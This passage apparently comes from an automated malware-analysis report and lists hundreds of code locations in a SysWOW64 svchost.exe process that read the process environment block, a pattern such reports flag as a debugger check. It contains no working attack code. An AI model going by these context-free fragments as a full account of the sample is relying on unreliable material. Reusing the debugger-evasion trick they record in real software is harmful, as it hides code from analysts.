            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF3E6 mov eax, dword ptr fs:[00000030h]9_2_03CEF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D053FC mov eax, dword ptr fs:[00000030h]9_2_03D053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]9_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]9_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]9_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C663FF mov eax, dword ptr fs:[00000030h]9_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2E388 mov eax, dword ptr fs:[00000030h]9_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2E388 mov eax, dword ptr fs:[00000030h]9_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2E388 mov eax, dword ptr fs:[00000030h]9_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5438F mov eax, dword ptr fs:[00000030h]9_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5438F mov eax, dword ptr fs:[00000030h]9_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0539D mov eax, dword ptr fs:[00000030h]9_2_03D0539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C8739A mov eax, dword ptr fs:[00000030h]9_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C8739A mov eax, dword ptr fs:[00000030h]9_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C28397 mov eax, dword ptr fs:[00000030h]9_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C28397 mov eax, dword ptr fs:[00000030h]9_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C28397 mov eax, dword ptr fs:[00000030h]9_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C533A5 mov eax, dword ptr fs:[00000030h]9_2_03C533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C633A0 mov eax, dword ptr fs:[00000030h]9_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C633A0 mov eax, dword ptr fs:[00000030h]9_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2D34C mov eax, dword ptr fs:[00000030h]9_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2D34C mov eax, dword ptr fs:[00000030h]9_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05341 mov eax, dword ptr fs:[00000030h]9_2_03D05341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29353 mov eax, dword ptr fs:[00000030h]9_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29353 mov eax, dword ptr fs:[00000030h]9_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB035C mov eax, dword ptr fs:[00000030h]9_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB035C mov eax, dword ptr fs:[00000030h]9_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB035C mov eax, dword ptr fs:[00000030h]9_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB035C mov ecx, dword ptr fs:[00000030h]9_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB035C mov eax, dword ptr fs:[00000030h]9_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB035C mov eax, dword ptr fs:[00000030h]9_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFA352 mov eax, dword ptr fs:[00000030h]9_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF367 mov eax, dword ptr fs:[00000030h]9_2_03CEF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CD437C mov eax, dword ptr fs:[00000030h]9_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C37370 mov eax, dword ptr fs:[00000030h]9_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C37370 mov eax, dword ptr fs:[00000030h]9_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C37370 mov eax, dword ptr fs:[00000030h]9_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB930B mov eax, dword ptr fs:[00000030h]9_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB930B mov eax, dword ptr fs:[00000030h]9_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB930B mov eax, dword ptr fs:[00000030h]9_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6A30B mov eax, dword ptr fs:[00000030h]9_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6A30B mov eax, dword ptr fs:[00000030h]9_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6A30B mov eax, dword ptr fs:[00000030h]9_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2C310 mov ecx, dword ptr fs:[00000030h]9_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C50310 mov ecx, dword ptr fs:[00000030h]9_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF132D mov eax, dword ptr fs:[00000030h]9_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF132D mov eax, dword ptr fs:[00000030h]9_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5F32A mov eax, dword ptr fs:[00000030h]9_2_03C5F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C27330 mov eax, dword ptr fs:[00000030h]9_2_03C27330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]9_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]9_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]9_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]9_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]9_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C392C5 mov eax, dword ptr fs:[00000030h]9_2_03C392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C392C5 mov eax, dword ptr fs:[00000030h]9_2_03C392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]9_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]9_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B2D3 mov eax, dword ptr fs:[00000030h]9_2_03C2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5F2D0 mov eax, dword ptr fs:[00000030h]9_2_03C5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5F2D0 mov eax, dword ptr fs:[00000030h]9_2_03C5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED mov eax, dword ptr fs:[00000030h]9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C402E1 mov eax, dword ptr fs:[00000030h]9_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C402E1 mov eax, dword ptr fs:[00000030h]9_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C402E1 mov eax, dword ptr fs:[00000030h]9_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D052E2 mov eax, dword ptr fs:[00000030h]9_2_03D052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF2F8 mov eax, dword ptr fs:[00000030h]9_2_03CEF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C292FF mov eax, dword ptr fs:[00000030h]9_2_03C292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6E284 mov eax, dword ptr fs:[00000030h]9_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6E284 mov eax, dword ptr fs:[00000030h]9_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB0283 mov eax, dword ptr fs:[00000030h]9_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB0283 mov eax, dword ptr fs:[00000030h]9_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB0283 mov eax, dword ptr fs:[00000030h]9_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05283 mov eax, dword ptr fs:[00000030h]9_2_03D05283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6329E mov eax, dword ptr fs:[00000030h]9_2_03C6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6329E mov eax, dword ptr fs:[00000030h]9_2_03C6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C402A0 mov eax, dword ptr fs:[00000030h]9_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C402A0 mov eax, dword ptr fs:[00000030h]9_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C452A0 mov eax, dword ptr fs:[00000030h]9_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C452A0 mov eax, dword ptr fs:[00000030h]9_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C452A0 mov eax, dword ptr fs:[00000030h]9_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C452A0 mov eax, dword ptr fs:[00000030h]9_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF92A6 mov eax, dword ptr fs:[00000030h]9_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF92A6 mov eax, dword ptr fs:[00000030h]9_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF92A6 mov eax, dword ptr fs:[00000030h]9_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF92A6 mov eax, dword ptr fs:[00000030h]9_2_03CF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC62A0 mov eax, dword ptr fs:[00000030h]9_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]9_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC62A0 mov eax, dword ptr fs:[00000030h]9_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC62A0 mov eax, dword ptr fs:[00000030h]9_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC62A0 mov eax, dword ptr fs:[00000030h]9_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC62A0 mov eax, dword ptr fs:[00000030h]9_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC72A0 mov eax, dword ptr fs:[00000030h]9_2_03CC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC72A0 mov eax, dword ptr fs:[00000030h]9_2_03CC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB92BC mov eax, dword ptr fs:[00000030h]9_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB92BC mov eax, dword ptr fs:[00000030h]9_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB92BC mov ecx, dword ptr fs:[00000030h]9_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB92BC mov ecx, dword ptr fs:[00000030h]9_2_03CB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29240 mov eax, dword ptr fs:[00000030h]9_2_03C29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29240 mov eax, dword ptr fs:[00000030h]9_2_03C29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6724D mov eax, dword ptr fs:[00000030h]9_2_03C6724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A250 mov eax, dword ptr fs:[00000030h]9_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEB256 mov eax, dword ptr fs:[00000030h]9_2_03CEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEB256 mov eax, dword ptr fs:[00000030h]9_2_03CEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C36259 mov eax, dword ptr fs:[00000030h]9_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C34260 mov eax, dword ptr fs:[00000030h]9_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C34260 mov eax, dword ptr fs:[00000030h]9_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C34260 mov eax, dword ptr fs:[00000030h]9_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFD26B mov eax, dword ptr fs:[00000030h]9_2_03CFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFD26B mov eax, dword ptr fs:[00000030h]9_2_03CFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2826B mov eax, dword ptr fs:[00000030h]9_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C59274 mov eax, dword ptr fs:[00000030h]9_2_03C59274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C71270 mov eax, dword ptr fs:[00000030h]9_2_03C71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C71270 mov eax, dword ptr fs:[00000030h]9_2_03C71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0274 mov eax, dword ptr fs:[00000030h]9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C67208 mov eax, dword ptr fs:[00000030h]9_2_03C67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C67208 mov eax, dword ptr fs:[00000030h]9_2_03C67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05227 mov eax, dword ptr fs:[00000030h]9_2_03D05227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2823B mov eax, dword ptr fs:[00000030h]9_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF61C3 mov eax, dword ptr fs:[00000030h]9_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF61C3 mov eax, dword ptr fs:[00000030h]9_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6D1D0 mov eax, dword ptr fs:[00000030h]9_2_03C6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6D1D0 mov ecx, dword ptr fs:[00000030h]9_2_03C6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D051CB mov eax, dword ptr fs:[00000030h]9_2_03D051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C551EF mov eax, dword ptr fs:[00000030h]9_2_03C551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C351ED mov eax, dword ptr fs:[00000030h]9_2_03C351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D061E5 mov eax, dword ptr fs:[00000030h]9_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C601F8 mov eax, dword ptr fs:[00000030h]9_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C70185 mov eax, dword ptr fs:[00000030h]9_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEC188 mov eax, dword ptr fs:[00000030h]9_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEC188 mov eax, dword ptr fs:[00000030h]9_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB019F mov eax, dword ptr fs:[00000030h]9_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB019F mov eax, dword ptr fs:[00000030h]9_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB019F mov eax, dword ptr fs:[00000030h]9_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB019F mov eax, dword ptr fs:[00000030h]9_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A197 mov eax, dword ptr fs:[00000030h]9_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A197 mov eax, dword ptr fs:[00000030h]9_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2A197 mov eax, dword ptr fs:[00000030h]9_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C87190 mov eax, dword ptr fs:[00000030h]9_2_03C87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE11A4 mov eax, dword ptr fs:[00000030h]9_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE11A4 mov eax, dword ptr fs:[00000030h]9_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE11A4 mov eax, dword ptr fs:[00000030h]9_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE11A4 mov eax, dword ptr fs:[00000030h]9_2_03CE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4B1B0 mov eax, dword ptr fs:[00000030h]9_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05152 mov eax, dword ptr fs:[00000030h]9_2_03D05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov eax, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov eax, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov ecx, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov eax, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CC4144 mov eax, dword ptr fs:[00000030h]9_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29148 mov eax, dword ptr fs:[00000030h]9_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29148 mov eax, dword ptr fs:[00000030h]9_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29148 mov eax, dword ptr fs:[00000030h]9_2_03C29148
